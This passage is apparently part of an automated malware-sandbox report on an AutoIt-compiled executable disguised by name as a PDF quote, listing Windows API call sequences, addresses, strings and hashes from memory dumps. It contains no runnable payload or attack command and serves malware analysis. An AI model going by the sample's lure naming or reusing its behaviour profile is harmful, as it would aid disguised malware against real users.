                                                                      • Part of subcall function 00EEA8FC: SelectObject.GDI32(?,?), ref: 00EEA9AC
                                                                      • Part of subcall function 00EEA8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 00EEA9CB
                                                                      • Part of subcall function 00EEA8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EEA9E2
                                                                      • Part of subcall function 00EEA8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 00EEA9F7
                                                                      • Part of subcall function 00EEA8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EEAA1F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 3521893082-0
                                                                    • Opcode ID: 589400440784bec8420f10b4a1ec658cd21a2927f0f529f29ded822a11686d9a
                                                                    • Instruction ID: 1c432870accf736b3303aaf9c48e1bb39ee84517ba5c26191d3d7e0031db0a59
                                                                    • Opcode Fuzzy Hash: 589400440784bec8420f10b4a1ec658cd21a2927f0f529f29ded822a11686d9a
                                                                    • Instruction Fuzzy Hash: D691A071008389EFDB109F65DC48E5B7BB9FF88321F141A2DF562AA1A1C730E948CB52
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?), ref: 00E62CA2
                                                                    • DeleteObject.GDI32(00000000), ref: 00E62CE8
                                                                    • DeleteObject.GDI32(00000000), ref: 00E62CF3
                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00E62CFE
                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00E62D09
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E9C5BB
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E9C5F4
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E9CA1D
                                                                      • Part of subcall function 00E61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E62036,?,00000000,?,?,?,?,00E616CB,00000000,?), ref: 00E61B9A
                                                                    • SendMessageW.USER32(?,00001053), ref: 00E9CA5A
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E9CA71
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E9CA87
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E9CA92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 464785882-4108050209
                                                                    • Opcode ID: b65744832900ce97614b675072cf23e4520df36cc28b57c7e97ea702aba99998
                                                                    • Instruction ID: a003841e66b16eea863c7e095f5ea134909eddcac8bf37d64bf8b9e912623b40
                                                                    • Opcode Fuzzy Hash: b65744832900ce97614b675072cf23e4520df36cc28b57c7e97ea702aba99998
                                                                    • Instruction Fuzzy Hash: B3129D30600641EFDB24EF24D884BA9B7E1BF48344F64656DF996EB262C731EC46CB91
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000), ref: 00ED75F3
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00ED76B2
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00ED76F0
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00ED7702
                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00ED7748
                                                                    • GetClientRect.USER32(00000000,?), ref: 00ED7754
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00ED7798
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00ED77A7
                                                                    • GetStockObject.GDI32(00000011), ref: 00ED77B7
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00ED77BB
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00ED77CB
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ED77D4
                                                                    • DeleteDC.GDI32(00000000), ref: 00ED77DD
                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00ED7809
                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00ED7820
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00ED785B
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00ED786F
                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00ED7880
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00ED78B0
                                                                    • GetStockObject.GDI32(00000011), ref: 00ED78BB
                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00ED78C6
                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00ED78D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: 5199f718645e34b9dd9d311596dbfdd8c43eafbb652c52965dac23eafd4feefc
                                                                    • Instruction ID: f018e79a033d0de867492b6d826512eb161981f7dbbf43321acee550d5fda82e
                                                                    • Opcode Fuzzy Hash: 5199f718645e34b9dd9d311596dbfdd8c43eafbb652c52965dac23eafd4feefc
                                                                    • Instruction Fuzzy Hash: 11A19171A40619BFEB14DBA5DC8AFAE7BB9EB44710F104115FA14BB2E1D770AD01CB60
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00ECADAA
                                                                    • GetDriveTypeW.KERNEL32(?,00EEFAC0,?,\\.\,00EEF910), ref: 00ECAE87
                                                                    • SetErrorMode.KERNEL32(00000000,00EEFAC0,?,\\.\,00EEF910), ref: 00ECAFE5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: c947486ac3819e4c1cf92e745eefb4340bb152aba607309c90ac6a720b539a1a
                                                                    • Instruction ID: 07c1b6418cd18d5d6d52264099d7889cc448bf3d4c433eb671e4e882eb474aa6
                                                                    • Opcode Fuzzy Hash: c947486ac3819e4c1cf92e745eefb4340bb152aba607309c90ac6a720b539a1a
                                                                    • Instruction Fuzzy Hash: E151557474824DABCB00DB50DB92EE9B7B1AB4474C728606EE506B7191CB32DD83DB93
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 1038674560-86951937
                                                                    • Opcode ID: 9e442de47dfa06ff4d413fa1ac206f9079545947b236c8064d171d5594b014c5
                                                                    • Instruction ID: a32e0e2e3b4f269ceac4d67039f949bbb80d3315369a57941dc279354db58059
                                                                    • Opcode Fuzzy Hash: 9e442de47dfa06ff4d413fa1ac206f9079545947b236c8064d171d5594b014c5
                                                                    • Instruction Fuzzy Hash: E9810970780305BACF20FF61ED82FEE7798AF11794F046025FA49BA197EB60DA51C291
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 00EEA935
                                                                    • SetTextColor.GDI32(?,?), ref: 00EEA939
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EEA94F
                                                                    • GetSysColor.USER32(0000000F), ref: 00EEA95A
                                                                    • CreateSolidBrush.GDI32(?), ref: 00EEA95F
                                                                    • GetSysColor.USER32(00000011), ref: 00EEA977
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EEA985
                                                                    • SelectObject.GDI32(?,00000000), ref: 00EEA996
                                                                    • SetBkColor.GDI32(?,00000000), ref: 00EEA99F
                                                                    • SelectObject.GDI32(?,?), ref: 00EEA9AC
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00EEA9CB
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EEA9E2
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00EEA9F7
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EEAA1F
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EEAA46
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00EEAA64
                                                                    • DrawFocusRect.USER32(?,?), ref: 00EEAA6F
                                                                    • GetSysColor.USER32(00000011), ref: 00EEAA7D
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00EEAA85
                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EEAA99
                                                                    • SelectObject.GDI32(?,00EEA62C), ref: 00EEAAB0
                                                                    • DeleteObject.GDI32(?), ref: 00EEAABB
                                                                    • SelectObject.GDI32(?,?), ref: 00EEAAC1
                                                                    • DeleteObject.GDI32(?), ref: 00EEAAC6
                                                                    • SetTextColor.GDI32(?,?), ref: 00EEAACC
                                                                    • SetBkColor.GDI32(?,?), ref: 00EEAAD6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1996641542-0
                                                                    • Opcode ID: c29411085f5963acd4d65e1a2cbaa354e29d859dfa9454be2c19c41e4a0c3a2a
                                                                    • Instruction ID: a889f8d58e95c6530431575c65cf661108b030c73cbfa63710f4bb4f2e120e46
                                                                    • Opcode Fuzzy Hash: c29411085f5963acd4d65e1a2cbaa354e29d859dfa9454be2c19c41e4a0c3a2a
                                                                    • Instruction Fuzzy Hash: A8515B7190124CEFDF109FA5DC88AAEBBB9EB48320F154225F915BB2A1D6719944CF90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EE8AF3
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EE8B04
                                                                    • CharNextW.USER32(0000014E), ref: 00EE8B33
                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EE8B74
                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EE8B8A
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EE8B9B
                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EE8BB8
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00EE8C0A
                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EE8C20
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EE8C51
                                                                    • _memset.LIBCMT ref: 00EE8C76
                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EE8CBF
                                                                    • _memset.LIBCMT ref: 00EE8D1E
                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EE8D48
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EE8DA0
                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00EE8E4D
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00EE8E6F
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EE8EB9
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EE8EE6
                                                                    • DrawMenuBar.USER32(?), ref: 00EE8EF5
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00EE8F1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                    • String ID: 0
                                                                    • API String ID: 1073566785-4108050209
                                                                    • Opcode ID: a046908d1efe185dd4f70f1cf73d603b97667795c7a3b352edc5107b7f7aca33
                                                                    • Instruction ID: b1a6ee59b8500c75dfb50e658fad2e6c87d8653308301816d9a2c7ee7d18b4a0
                                                                    • Opcode Fuzzy Hash: a046908d1efe185dd4f70f1cf73d603b97667795c7a3b352edc5107b7f7aca33
                                                                    • Instruction Fuzzy Hash: D2E18F7090028CAFDF209F52CD84AEE7BB9EF15754F10916AF91DBA190DB708A85DF60
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00EE4A33
                                                                    • GetDesktopWindow.USER32 ref: 00EE4A48
                                                                    • GetWindowRect.USER32(00000000), ref: 00EE4A4F
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EE4AB1
                                                                    • DestroyWindow.USER32(?), ref: 00EE4ADD
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EE4B06
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EE4B24
                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EE4B4A
                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00EE4B5F
                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EE4B72
                                                                    • IsWindowVisible.USER32(?), ref: 00EE4B92
                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EE4BAD
                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EE4BC1
                                                                    • GetWindowRect.USER32(?,?), ref: 00EE4BD9
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00EE4BFF
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00EE4C19
                                                                    • CopyRect.USER32(?,?), ref: 00EE4C30
                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00EE4C9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: 45a56077bd31ab26b75c86e77511a04e0b78f84af2ba694c3e6e926819eedce5
                                                                    • Instruction ID: 51beed2223faab6276cb205e997177286bc3b706a895b3cfaced390abd419ae9
                                                                    • Opcode Fuzzy Hash: 45a56077bd31ab26b75c86e77511a04e0b78f84af2ba694c3e6e926819eedce5
                                                                    • Instruction Fuzzy Hash: F4B190B1604385AFDB04DF66C884B6ABBE4FF88314F00992CF599AB291D771EC04CB95
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E628BC
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00E628C4
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E628EF
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00E628F7
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00E6291C
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E62939
                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E62949
                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E6297C
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E62990
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00E629AE
                                                                    • GetStockObject.GDI32(00000011), ref: 00E629CA
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E629D5
                                                                      • Part of subcall function 00E62344: GetCursorPos.USER32(?), ref: 00E62357
                                                                      • Part of subcall function 00E62344: ScreenToClient.USER32(00F257B0,?), ref: 00E62374
                                                                      • Part of subcall function 00E62344: GetAsyncKeyState.USER32(00000001), ref: 00E62399
                                                                      • Part of subcall function 00E62344: GetAsyncKeyState.USER32(00000002), ref: 00E623A7
                                                                    • SetTimer.USER32(00000000,00000000,00000028,00E61256), ref: 00E629FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    • Opcode ID: 25dc40107899b90cca127ba18b8b04e9d69c98b1bfcb1fd56e8d36f67209d956
                                                                    • Instruction ID: 6a394ce74409181c6df546517a84ccfea24d04e5d1b9645fc4b79e4d839eb081
                                                                    • Opcode Fuzzy Hash: 25dc40107899b90cca127ba18b8b04e9d69c98b1bfcb1fd56e8d36f67209d956
                                                                    • Instruction Fuzzy Hash: 8DB17C71A4060ADFDF14DFA8EC85BED7BA4FB48714F109229FA15BB2A0DB709845CB50
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00EBA885
                                                                    • __swprintf.LIBCMT ref: 00EBA926
                                                                    • _wcscmp.LIBCMT ref: 00EBA939
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EBA98E
                                                                    • _wcscmp.LIBCMT ref: 00EBA9CA
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00EBAA01
                                                                    • GetDlgCtrlID.USER32(?), ref: 00EBAA53
                                                                    • GetWindowRect.USER32(?,?), ref: 00EBAA89
                                                                    • GetParent.USER32(?), ref: 00EBAAA7
                                                                    • ScreenToClient.USER32(00000000), ref: 00EBAAAE
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00EBAB28
                                                                    • _wcscmp.LIBCMT ref: 00EBAB3C
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00EBAB62
                                                                    • _wcscmp.LIBCMT ref: 00EBAB76
                                                                      • Part of subcall function 00E837AC: _iswctype.LIBCMT ref: 00E837B4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                    • String ID: %s%u
                                                                    • API String ID: 3744389584-679674701
                                                                    • Opcode ID: bbfbf01c0a3acb6c5efd244e84751bcea762ac292a6beac94b7a14ee18726c26
                                                                    • Instruction ID: 36deb19b553f42da1c1c6989199553156bca5e09787cc606962657658ae33d19
                                                                    • Opcode Fuzzy Hash: bbfbf01c0a3acb6c5efd244e84751bcea762ac292a6beac94b7a14ee18726c26
                                                                    • Instruction Fuzzy Hash: CFA1B071204246AFDB15DF24C884FEBB7E9FF44318F049639F9A9A2151DB30E945CB92
                                                                    APIs
                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00EBB1DA
                                                                    • _wcscmp.LIBCMT ref: 00EBB1EB
                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00EBB213
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00EBB230
                                                                    • _wcscmp.LIBCMT ref: 00EBB24E
                                                                    • _wcsstr.LIBCMT ref: 00EBB25F
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00EBB297
                                                                    • _wcscmp.LIBCMT ref: 00EBB2A7
                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00EBB2CE
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00EBB317
                                                                    • _wcscmp.LIBCMT ref: 00EBB327
                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00EBB34F
                                                                    • GetWindowRect.USER32(00000004,?), ref: 00EBB3B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                    • String ID: @$ThumbnailClass
                                                                    • API String ID: 1788623398-1539354611
